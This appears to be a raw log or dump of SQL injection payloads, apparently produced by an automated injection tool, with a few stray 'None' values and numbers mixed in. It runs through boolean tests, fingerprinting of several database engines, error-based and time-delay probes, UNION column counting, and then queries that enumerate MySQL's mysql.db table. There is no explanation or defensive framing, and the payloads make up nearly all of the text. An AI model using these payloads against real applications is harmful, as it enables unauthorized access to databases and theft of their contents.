None
None
9335
6180
1) AND 9556=6189 AND (6577=6577
1) AND 3561=3561 AND (1449=1449
1 AND 5071=2653
1 AND 3561=3561
1 AND 4775=2832
1 AND (SELECT CHR(79)&CHR(108)&CHR(114)&CHR(113) FROM MSysAccessObjects)=CHR(79)&CHR(108)&CHR(114)&CHR(113)
1 AND (SELECT CHR(79)||CHR(108)||CHR(114)||CHR(113) FROM SYSIBM.SYSDUMMY1)=CHR(79)||CHR(108)||CHR(114)||CHR(113)
1 AND (SELECT 'Olrq' FROM RDB$DATABASE)='Olrq'
1 AND (SELECT CHAR(79)||CHAR(108)||CHAR(114)||CHAR(113) FROM INFORMATION_SCHEMA.SYSTEM_USERS)=CHAR(79)||CHAR(108)||CHAR(114)||CHAR(113)
1 AND (SELECT 'Olrq' FROM VERSIONS)='Olrq'
1 AND (SELECT CHAR(79)+CHAR(108)+CHAR(114)+CHAR(113))=CHAR(79)+CHAR(108)+CHAR(114)+CHAR(113)
1 AND (SELECT CHAR(79)+CHAR(108)+CHAR(114)+CHAR(113))=CHAR(121)+CHAR(68)+CHAR(101)+CHAR(100)
1 AND (SELECT CHR(79)||CHR(108)||CHR(114)||CHR(113) FROM DUAL)=CHR(79)||CHR(108)||CHR(114)||CHR(113)
1 AND (SELECT 8882 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (CASE WHEN (8882=8882) THEN 1 ELSE 0 END)),0x717a766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1 AND 3350=CAST((CHR(113)||CHR(106)||CHR(98)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (3350=3350) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(118)||CHR(107)||CHR(113)) AS NUMERIC)
1 AND 4865=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4865=4865) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(107)+CHAR(113)))
1 AND 6815=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (6815=6815) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)
(SELECT CONCAT(0x716a627671,(SELECT (CASE WHEN (8401=8401) THEN 1 ELSE 0 END)),0x717a766b71))
(SELECT (CHR(113)||CHR(106)||CHR(98)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (1650=1650) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(118)||CHR(107)||CHR(113)))
(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8332=8332) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(107)+CHAR(113))
(SELECT CHR(113)||CHR(106)||CHR(98)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (5378=5378) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(118)||CHR(107)||CHR(113) FROM DUAL)
SELECT 'qjbvq'||(SELECT (CASE WHEN (3804=3804) THEN 1 ELSE 0 END))||'qzvkq'
1; SELECT SLEEP(5)-- 
None
None
None
None
None
1; SELECT PG_SLEEP(5)--
1; WAITFOR DELAY '0:0:5'--
1 AND SLEEP(5)
1 AND 4265=(SELECT 4265 FROM PG_SLEEP(5))
1 WAITFOR DELAY '0:0:5'--
1 AND 3570=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(77)||CHR(88)||CHR(102),5)
1 ORDER BY 1#
1 UNION ALL SELECT NULL#
1 UNION ALL SELECT NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 UNION ALL SELECT CONCAT(0x716a627671,0x504259704e64584a5676,0x717a766b71),NULL#
1 UNION ALL SELECT NULL,CONCAT(0x716a627671,0x4b5a4f6c59734441566b,0x717a766b71)#
-6820 UNION ALL SELECT NULL,CONCAT(0x716a627671,0x65625a4a4f7557664358,0x717a766b71)#
-8863 UNION ALL SELECT CONCAT(0x716a627671,0x466e6572695765657962,0x717a766b71),NULL#
-4229 UNION ALL SELECT CONCAT(0x716a627671,(CASE WHEN (QUARTER(NULL) IS NULL) THEN 1 ELSE 0 END),0x717a766b71),NULL#
-3397 UNION ALL SELECT CONCAT(0x716a627671,(CASE WHEN (USER() LIKE USER()) THEN 1 ELSE 0 END),0x717a766b71),NULL#
-4198 UNION ALL SELECT CONCAT(0x716a627671,(CASE WHEN (ISNULL(TIMESTAMPADD(MINUTE,2328,NULL))) THEN 1 ELSE 0 END),0x717a766b71),NULL#
-5272 UNION ALL SELECT CONCAT(0x716a627671,(CASE WHEN (DATABASE() LIKE SCHEMA()) THEN 1 ELSE 0 END),0x717a766b71),NULL#
-3874 UNION ALL SELECT CONCAT(0x716a627671,(CASE WHEN (STRCMP(LOWER(CURRENT_USER()),UPPER(CURRENT_USER()))=0) THEN 1 ELSE 0 END),0x717a766b71),NULL#
-8093 UNION ALL SELECT CONCAT(0x716a627671,IFNULL(CAST(COUNT(db) AS CHAR),0x20),0x717a766b71),NULL FROM mysql.db#
-2685 UNION ALL SELECT (SELECT CONCAT(0x716a627671,IFNULL(CAST(db AS CHAR),0x20),0x717a766b71) FROM mysql.db LIMIT 0,1),NULL#
-8316 UNION ALL SELECT (SELECT CONCAT(0x716a627671,IFNULL(CAST(db AS CHAR),0x20),0x717a766b71) FROM mysql.db LIMIT 1,1),NULL#
-6316 UNION ALL SELECT (SELECT CONCAT(0x716a627671,IFNULL(CAST(db AS CHAR),0x20),0x717a766b71) FROM mysql.db LIMIT 2,1),NULL#
-1806 UNION ALL SELECT (SELECT CONCAT(0x716a627671,IFNULL(CAST(db AS CHAR),0x20),0x717a766b71) FROM mysql.db LIMIT 3,1),NULL#
-3763 UNION ALL SELECT (SELECT CONCAT(0x716a627671,IFNULL(CAST(db AS CHAR),0x20),0x717a766b71) FROM mysql.db LIMIT 4,1),NULL#
-5416 UNION ALL SELECT (SELECT CONCAT(0x716a627671,IFNULL(CAST(db AS CHAR),0x20),0x717a766b71) FROM mysql.db LIMIT 5,1),NULL#
-5650 UNION ALL SELECT (SELECT CONCAT(0x716a627671,IFNULL(CAST(db AS CHAR),0x20),0x717a766b71) FROM mysql.db LIMIT 6,1),NULL#
-7439 UNION ALL SELECT (SELECT CONCAT(0x716a627671,IFNULL(CAST(db AS CHAR),0x20),0x717a766b71) FROM mysql.db LIMIT 7,1),NULL#
